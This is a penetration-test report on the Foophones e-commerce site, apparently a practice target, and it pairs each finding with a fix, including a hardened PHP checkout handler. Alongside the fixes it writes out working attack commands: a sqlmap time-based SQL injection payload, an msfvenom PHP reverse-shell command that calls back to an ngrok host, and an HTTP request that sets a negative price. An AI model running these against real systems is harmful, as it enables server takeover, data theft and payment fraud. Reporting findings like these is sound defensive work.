1. Executive Summary
The security assessment of the e-commerce website Foophones revealed multiple critical vulnerabilities that could be exploited by an attacker to gain unauthorized access, manipulate transactions, and execute remote code on the server. The identified issues include SQL Injection, Remote Code Execution (RCE), Broken Authentication, and Insecure Direct Object References (IDOR).
These vulnerabilities pose a severe risk to user data integrity, system security, and business operations. Immediate remediation is recommended.
2. Scope of Testing
Target: http://foophones.securitybrigade.com
Methodology: Manual and Automated Testing
Tools Used:
- SQLmap (SQL Injection)
- Burp Suite (Intercepting and Manipulating Requests)
- Metasploit (Reverse Shell, RCE)
- Dirb (Directory Enumeration)
- Nikto (Web Server Scanning)
- Nmap (Port Scanning)
- ngrok (Exposing Localhost for Reverse Shell)
3. Identified Vulnerabilities
3.1 SQL Injection in User Authentication
Affected Endpoint: /register.php (MULTIPART user parameter)
Vulnerability Type: Boolean-based and Time-based Blind SQL Injection
Exploited With:
```shell
sqlmap -u "http://foophones.securitybrigade.com/register.php" --data "user=sduni' AND (SELECT 9642 FROM (SELECT(SLEEP(5)))TNxX) AND 'YHHT'='YHHT" --dbs
```
Impact:
- Full database compromise
- Exfiltration of customer and order data
- Possible privilege escalation
Recommendation:
- Implement parameterized queries
- Sanitize and validate all user inputs
- Restrict database privileges
3.2 Remote Code Execution (RCE) via File Upload
Affected Endpoint: /register.php
Payload Used:
```shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=14727 -f raw -o shell.php
```
Attack Process:
- Uploaded shell.php via the file upload function
- Gained a reverse shell via Metasploit, allowing execution of system commands on the server
Impact:
- Full server compromise
- Data theft and modification
Recommendation:
- Restrict allowed file types
- Implement strong input validation
- Disable execution permissions in upload directories
3.3 Cleartext Password Submission
Affected Pages: /login.php, /register.php
Issue: User passwords are sent in plain text over HTTP
Impact:
- Passwords can be intercepted via MITM attacks
- User accounts are highly vulnerable to credential theft
Recommendation:
- Implement HTTPS with TLS 1.2+
- Encrypt passwords before transmission
- Use modern authentication protocols (OAuth, JWT, etc.)
3.4 Insecure Payment Manipulation
Affected Endpoint: /buy_confirm.php
Issue: The price parameter can be modified in the request
Payload Used (the blank line separating headers from body is required by HTTP; Content-Length 31 matches the body shown):
```http
POST /buy_confirm.php HTTP/1.1
Host: foophones.securitybrigade.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

shipping=ITM&price=-100000&id=1
```
Impact:
- Users can manipulate order values
- Negative prices result in a credit to user accounts
- Financial losses for the business
Recommendation:
- Implement server-side price validation
- Store prices securely on the server
- Use token-based request verification
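The following is an added example of a hardened buy_confirm.php handler, not Foophones' own code; it applies the three recommendations above and, through its prepared statement, the parameterized-query recommendation from 3.1. It assumes a PDO connection in `$pdo`, a `phones` table with columns `id` and `price_cents`, and a per-session token stored in `$_SESSION['csrf']` that the order form carries as a hidden field named `csrf` (all assumed names).

```php
<?php
// Added example, not Foophones' own code. Assumed: $pdo (PDO), a `phones` table
// (id, price_cents), and $_SESSION['csrf'] issued when the order form was rendered.
declare(strict_types=1);

/** Resolve the authoritative price for an item id with a prepared statement. */
function catalogue_price(PDO $pdo, int $id): ?int
{
    // Bound parameter: the id can never alter the SQL text (the fix for finding 3.1).
    $stmt = $pdo->prepare('SELECT price_cents FROM phones WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetchColumn();
    return $row === false ? null : (int) $row;
}

session_start();
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit('method not allowed');
}

// Token-based request verification: the session must hold a token and it must match.
$known = $_SESSION['csrf'] ?? '';
$token = $_POST['csrf'] ?? '';
if ($known === '' || !is_string($token) || !hash_equals($known, $token)) {
    http_response_code(403);
    exit('invalid request token');
}

// Strict integer validation of the item id; anything else never reaches the database.
$id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('invalid item id');
}

// The posted `price` field is never used: the price comes from the server-side
// catalogue, so price=-100000 in the request can no longer credit the account.
$priceCents = catalogue_price($pdo, $id);
if ($priceCents === null || $priceCents <= 0) {
    http_response_code(400);
    exit('unknown item');
}

// A posted price that disagrees with the catalogue is a tamper signal worth logging.
if (isset($_POST['price']) && (int) round(((float) $_POST['price']) * 100) !== $priceCents) {
    error_log(sprintf('buy_confirm: price mismatch for id=%d, posted=%s', $id, (string) $_POST['price']));
}

// Continue creating the order using $priceCents only.
```

Detection note: the mismatch log line gives the SOC a concrete signal for the manipulation described above, provided logs are shipped off-host (see the logging gap in section 4).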
3.5 Directory Listing Enabled
Affected Directories:
- /images/
- /include/
- /scripts/
Issue: Sensitive files can be accessed directly
Impact:
- Exposed internal scripts and configurations
- Potential for further exploitation
Recommendation:
- Disable directory listing in Apache/Nginx settings
- Use .htaccess to restrict access
3.6 CVSS Score Chart
4. Additional Findings
- No Web Application Firewall (WAF) detected
- No proper logging of unauthorized actions (Logs could be deleted manually)
- Server Information Disclosure via phpinfo.php
5. Recommended Mitigation Strategy
| Vulnerability | Recommended Fix | Priority |
|---|---|---|
| SQL Injection | Use parameterized queries, input validation | Critical |
| RCE via File Upload | Restrict file types, disable exec permissions | Critical |
| Cleartext Password Submission | Implement HTTPS, hash passwords | High |
| Payment Manipulation | Enforce server-side validation | High |
| Directory Listing Enabled | Disable indexing in server settings | Medium |
6. Conclusion
The assessment revealed multiple critical security flaws that could allow attackers to gain unauthorized access, manipulate transactions, and fully compromise the system. Immediate remediation is required.
Next Steps:
- Patch identified vulnerabilities immediately.
- Implement security best practices (WAF, logging, encryption).
- Conduct periodic security assessments and penetration testing.